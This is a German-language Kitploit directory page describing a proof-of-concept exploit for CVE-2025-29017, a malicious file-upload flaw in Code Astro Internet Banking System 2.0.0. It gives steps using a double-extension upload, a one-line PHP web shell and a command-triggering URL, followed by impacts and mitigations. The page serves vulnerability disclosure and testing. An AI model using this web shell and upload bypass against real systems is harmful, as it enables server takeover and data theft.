Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-29017 — Proof-of-concept-Exploit für CVE-2025-29017, der Remote-Codeausführung durch schädlichen Datei-Upload im Code Astro Internet Banking System 2.0.0 demonstriert. | Kitploit
Tools/GitHubGitHub/b1tm4r/cve-2025-29017
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubb1tm4r/cve-2025-29017

CVE-2025-29017

Proof-of-concept-Exploit für CVE-2025-29017, der Remote-Codeausführung durch schädlichen Datei-Upload im Code Astro Internet Banking System 2.0.0 demonstriert.

Repository anzeigen
12vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-29017 - Internet Banking System 2.0.0 Remote Code Execution via Profile Picture Upload

Beschreibung

Eine Remote Code Execution (RCE)-Schwachstelle existiert in Code Astro Internet Banking System 2.0.0 aufgrund einer unzureichenden Datei-Upload-Validierung im Parameter profile_pic innerhalb von pages_view_client.php. Angreifer können die Sicherheitsprüfungen umgehen, indem sie die Upload-Anfrage manipulieren, was zu beliebiger Codeausführung führt.

Betroffene Komponente

  • profile_pic-Parameter in pages_view_client.php
  • Upload-Funktion ermöglicht Ausführung bösartiger PHP-Dateien

Ausführungsschritte

  1. Navigieren Sie zu den Benutzerprofileinstellungen und wählen Sie ein neues Profilbild aus.



  1. Fangen Sie die Profilbild-Upload-Anfrage mit einem Tool wie Burp Suite ab.


  1. Ändern Sie die Datei zu einer doppelten Endung (.jpeg.php), passen Sie den Content-Type-Header auf application/x-php an und hängen Sie bösartigen PHP-Code an:
root@kitploit:~
<?php system($_GET['cmd']); ?>



  1. Sie können überprüfen, ob die Datei unter /admin/dist/img/ hochgeladen wurde:
root@kitploit:~
http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt


Auswirkungen

  • Vollständige Server-Kompromittierung
  • Datendiebstahl
  • Privilegieneskalation

Gegenmaßnahmen

  • Beschränken Sie Datei-Uploads auf reine Bildformate und überprüfen Sie MIME-Typen.
  • Bereinigen Sie Dateinamen und blockieren Sie Dateien mit ausführbarem Code.
  • Speichern Sie hochgeladene Dateien außerhalb des Web-Roots.

Referenzen

  • OWASP File Upload Security
Tool herunterladen